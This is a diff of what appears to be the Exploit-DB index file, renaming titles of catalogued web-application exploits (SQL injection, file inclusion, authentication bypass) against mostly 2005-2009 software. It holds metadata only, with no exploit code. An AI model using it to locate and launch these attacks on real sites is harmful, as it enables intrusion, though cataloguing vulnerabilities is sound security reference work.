20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - 'Index.dat' Exploit (MS00-055)",2000-11-23,"Georgi Guninski",windows,remote,0
|
||||
|
|
@ -15892,7 +15895,7 @@ id,file,description,date,author,platform,type,port
|
|||
873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users",2005-03-11,Ali7,php,webapps,0
|
||||
881,platforms/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,php,webapps,0
|
||||
889,platforms/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0
|
||||
892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass (SQL Injection)",2005-03-21,kre0n,php,webapps,0
|
||||
892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,php,webapps,0
|
||||
897,platforms/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0
|
||||
901,platforms/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,php,webapps,0
|
||||
907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0
|
||||
|
|
@ -15901,7 +15904,7 @@ id,file,description,date,author,platform,type,port
|
|||
922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps,0
|
||||
30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0
|
||||
923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0
|
||||
925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass (SQL Injection)",2005-04-09,LaMeR,asp,webapps,0
|
||||
925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Authentication Bypass",2005-04-09,LaMeR,asp,webapps,0
|
||||
928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' Parameter SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0
|
||||
939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0
|
||||
954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution",2005-04-25,z,cgi,webapps,0
|
||||
|
|
@ -16050,7 +16053,7 @@ id,file,description,date,author,platform,type,port
|
|||
1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0
|
||||
1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0
|
||||
1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0
|
||||
1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection",2006-02-06,Zodiac,asp,webapps,0
|
||||
1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - Authentication Bypass",2006-02-06,Zodiac,asp,webapps,0
|
||||
1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
|
||||
1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
|
||||
1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0
|
||||
|
|
@ -16656,7 +16659,7 @@ id,file,description,date,author,platform,type,port
|
|||
2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) SQL Injection",2006-09-17,ajann,asp,webapps,0
|
||||
2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - (users_logins/admin.txt) Credentials Disclosure",2006-09-17,Kacper,php,webapps,0
|
||||
2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps,0
|
||||
2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0
|
||||
2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0
|
||||
2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution",2006-09-19,rgod,php,webapps,0
|
||||
2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0
|
||||
2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0
|
||||
|
|
@ -17036,7 +17039,7 @@ id,file,description,date,author,platform,type,port
|
|||
2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0
|
||||
2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0
|
||||
2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - (adodb) Multiple Remote File Inclusion",2006-12-03,"Cold Zero",php,webapps,0
|
||||
2891,platforms/php/webapps/2891.txt,"cutenews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0
|
||||
2891,platforms/php/webapps/2891.txt,"CuteNews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0
|
||||
2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0
|
||||
2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0
|
||||
2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps,0
|
||||
|
|
@ -17387,7 +17390,7 @@ id,file,description,date,author,platform,type,port
|
|||
3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0
|
||||
3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0
|
||||
3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0
|
||||
3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
|
||||
3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - 'id' Parameter SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
|
||||
3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0
|
||||
3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0
|
||||
3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0
|
||||
|
|
@ -17729,7 +17732,7 @@ id,file,description,date,author,platform,type,port
|
|||
4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0
|
||||
4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps,0
|
||||
4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0
|
||||
4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0
|
||||
4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - 'index.php' SQL Injection",2007-06-03,Kacper,php,webapps,0
|
||||
4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0
|
||||
4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,php,webapps,0
|
||||
4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - (addressbook.php) Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0
|
||||
|
|
@ -17806,7 +17809,7 @@ id,file,description,date,author,platform,type,port
|
|||
4142,platforms/php/webapps/4142.txt,"Girlserv ads 1.5 - (details_news.php) SQL Injection",2007-07-03,"Cold Zero",php,webapps,0
|
||||
4144,platforms/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution (2)",2007-07-03,BlackHawk,php,webapps,0
|
||||
4145,platforms/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution (1)",2007-07-03,BlackHawk,php,webapps,0
|
||||
4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - viewforum.php SQL Injection",2007-07-03,Coloss,php,webapps,0
|
||||
4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection",2007-07-03,Coloss,php,webapps,0
|
||||
4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps,0
|
||||
4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - (callboth.php) Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0
|
||||
4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0
|
||||
|
|
@ -18213,7 +18216,7 @@ id,file,description,date,author,platform,type,port
|
|||
4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (all modules) SQL Injection",2007-12-26,JosS,php,webapps,0
|
||||
4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0
|
||||
4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0
|
||||
4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion",2007-12-26,irk4z,php,webapps,0
|
||||
4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - 'PHPEx' Parameter Local File Inclusion",2007-12-26,irk4z,php,webapps,0
|
||||
4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps,0
|
||||
4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0
|
||||
4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showcode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0
|
||||
|
|
@ -20378,7 +20381,7 @@ id,file,description,date,author,platform,type,port
|
|||
7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps,0
|
||||
7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0
|
||||
7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0
|
||||
7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0
|
||||
7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - Authentication Bypass",2008-12-29,AnGeL25dZ,php,webapps,0
|
||||
7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0
|
||||
|
|
@ -20416,29 +20419,29 @@ id,file,description,date,author,platform,type,port
|
|||
7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0
|
||||
7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0
|
||||
7653,platforms/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,php,webapps,0
|
||||
7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
|
||||
7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
|
||||
7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0
|
||||
7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Parameter Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
|
||||
7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
|
||||
7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' Parameter SQL Injection",2009-01-04,DaiMon,php,webapps,0
|
||||
7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0
|
||||
7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0
|
||||
7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0
|
||||
7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0
|
||||
7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0
|
||||
7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - Authentication Bypass",2009-01-05,ByALBAYX,asp,webapps,0
|
||||
7667,platforms/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0
|
||||
7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion",2009-01-05,JosS,php,webapps,0
|
||||
7669,platforms/php/webapps/7669.pl,"Joomla! Component com_na_newsdescription - (newsid) SQL Injection",2009-01-05,EcHoLL,php,webapps,0
|
||||
7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps,0
|
||||
7672,platforms/php/webapps/7672.txt,"phpauctionsystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0
|
||||
7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' Parameter SQL Injection",2009-01-05,EcHoLL,php,webapps,0
|
||||
7672,platforms/php/webapps/7672.txt,"PHPAuctionSystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0
|
||||
7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0
|
||||
7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusion",2009-01-06,darkmasking,php,webapps,0
|
||||
7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
|
||||
7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - 'forumid' Parameter Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
|
||||
7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - Cross-Site Scripting / SQL Injection",2009-01-06,!-BUGJACK-!,php,webapps,0
|
||||
7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0
|
||||
7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - Authentication Bypass",2009-01-06,ZoRLu,php,webapps,0
|
||||
7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0
|
||||
7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps,0
|
||||
7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0
|
||||
7689,platforms/php/webapps/7689.txt,"BlogHelper - 'common_db.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
|
||||
7690,platforms/php/webapps/7690.txt,"PollHelper - 'poll.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
|
||||
7687,platforms/php/webapps/7687.txt,"PlaySms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0
|
||||
7689,platforms/php/webapps/7689.txt,"BlogHelper - Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
|
||||
7690,platforms/php/webapps/7690.txt,"PollHelper - Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
|
||||
7691,platforms/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,php,webapps,0
|
||||
7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
|
||||
7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
|
||||
|
|
@ -20447,17 +20450,17 @@ id,file,description,date,author,platform,type,port
|
|||
7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
|
||||
7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
|
||||
7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0
|
||||
7711,platforms/php/webapps/7711.txt,"Fast FAQs System - (Authentication Bypass) SQL Injection",2009-01-09,x0r,php,webapps,0
|
||||
7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0
|
||||
7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
|
||||
7717,platforms/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
|
||||
7718,platforms/php/webapps/7718.txt,"Joomla! Component com_newsflash - 'id' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
|
||||
7719,platforms/php/webapps/7719.txt,"Fast Guest Book - (Authentication Bypass) SQL Injection",2009-01-11,Moudi,php,webapps,0
|
||||
7719,platforms/php/webapps/7719.txt,"Fast Guest Book - Authentication Bypass",2009-01-11,Moudi,php,webapps,0
|
||||
7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0
|
||||
7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0
|
||||
7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0
|
||||
7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection",2009-01-11,stylextra,php,webapps,0
|
||||
7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - (Authentication Bypass) SQL Injection",2009-01-11,SirGod,php,webapps,0
|
||||
7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - (Authentication Bypass) SQL Injection",2009-01-11,x0r,php,webapps,0
|
||||
7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - Authentication Bypass",2009-01-11,SirGod,php,webapps,0
|
||||
7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - Authentication Bypass",2009-01-11,x0r,php,webapps,0
|
||||
7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection",2009-01-11,FasTWORM,php,webapps,0
|
||||
7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0
|
||||
7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
|
||||
|
|
@ -20475,8 +20478,8 @@ id,file,description,date,author,platform,type,port
|
|||
7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0
|
||||
7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
|
||||
7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
|
||||
7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection",2009-01-13,darkjoker,php,webapps,0
|
||||
7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0
|
||||
7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - Authentication Bypass",2009-01-13,darkjoker,php,webapps,0
|
||||
7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - Authentication Bypass",2009-01-14,darkjoker,php,webapps,0
|
||||
7761,platforms/asp/webapps/7761.txt,"Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection",2009-01-14,Ellinas,asp,webapps,0
|
||||
7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0
|
||||
7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0
|
||||
|
|
@ -20506,13 +20509,13 @@ id,file,description,date,author,platform,type,port
|
|||
7796,platforms/php/webapps/7796.txt,"mkportal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0
|
||||
7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0
|
||||
7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - 'readbible.php' SQL Injection",2009-01-15,nuclear,php,webapps,0
|
||||
7800,platforms/asp/webapps/7800.txt,"eFAQ - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7801,platforms/asp/webapps/7801.txt,"eReservations - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7802,platforms/asp/webapps/7802.txt,"The Walking Club - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7803,platforms/asp/webapps/7803.txt,"Ping IP - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7800,platforms/asp/webapps/7800.txt,"eFAQ - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7801,platforms/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7802,platforms/asp/webapps/7802.txt,"The Walking Club - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7803,platforms/asp/webapps/7803.txt,"Ping IP - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7805,platforms/php/webapps/7805.txt,"Rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps,0
|
||||
7806,platforms/php/webapps/7806.txt,"blogit! - SQL Injection / File Disclosure / Cross-Site Scripting",2009-01-16,Pouya_Server,php,webapps,0
|
||||
7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection",2009-01-16,SuB-ZeRo,asp,webapps,0
|
||||
7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - Authentication Bypass",2009-01-16,SuB-ZeRo,asp,webapps,0
|
||||
7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
|
||||
7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
|
||||
7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
|
||||
|
|
@ -20520,7 +20523,7 @@ id,file,description,date,author,platform,type,port
|
|||
7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,php,webapps,0
|
||||
7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps,0
|
||||
7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0
|
||||
7817,platforms/php/webapps/7817.txt,"Click&Email - (Authentication Bypass) SQL Injection",2009-01-18,SuB-ZeRo,php,webapps,0
|
||||
7817,platforms/php/webapps/7817.txt,"Click&Email - Authentication Bypass",2009-01-18,SuB-ZeRo,php,webapps,0
|
||||
7818,platforms/php/webapps/7818.txt,"SCMS 1 - 'index.php p' Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0
|
||||
7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0
|
||||
7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0
|
||||
|
|
@ -20547,7 +20550,7 @@ id,file,description,date,author,platform,type,port
|
|||
7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,php,webapps,0
|
||||
7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,php,webapps,0
|
||||
7860,platforms/php/webapps/7860.php,"Mambo Component 'com_sim' 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0
|
||||
7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0
|
||||
7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - Authentication Bypass",2009-01-25,ByALBAYX,asp,webapps,0
|
||||
7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0
|
||||
7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0
|
||||
7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0
|
||||
|
|
@ -20560,7 +20563,7 @@ id,file,description,date,author,platform,type,port
|
|||
7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0
|
||||
7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0
|
||||
7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion",2009-01-26,darkjoker,php,webapps,0
|
||||
7880,platforms/php/webapps/7880.txt,"ClickAuction - (Authentication Bypass) SQL Injection",2009-01-26,R3d-D3V!L,php,webapps,0
|
||||
7880,platforms/php/webapps/7880.txt,"ClickAuction - Authentication Bypass",2009-01-26,R3d-D3V!L,php,webapps,0
|
||||
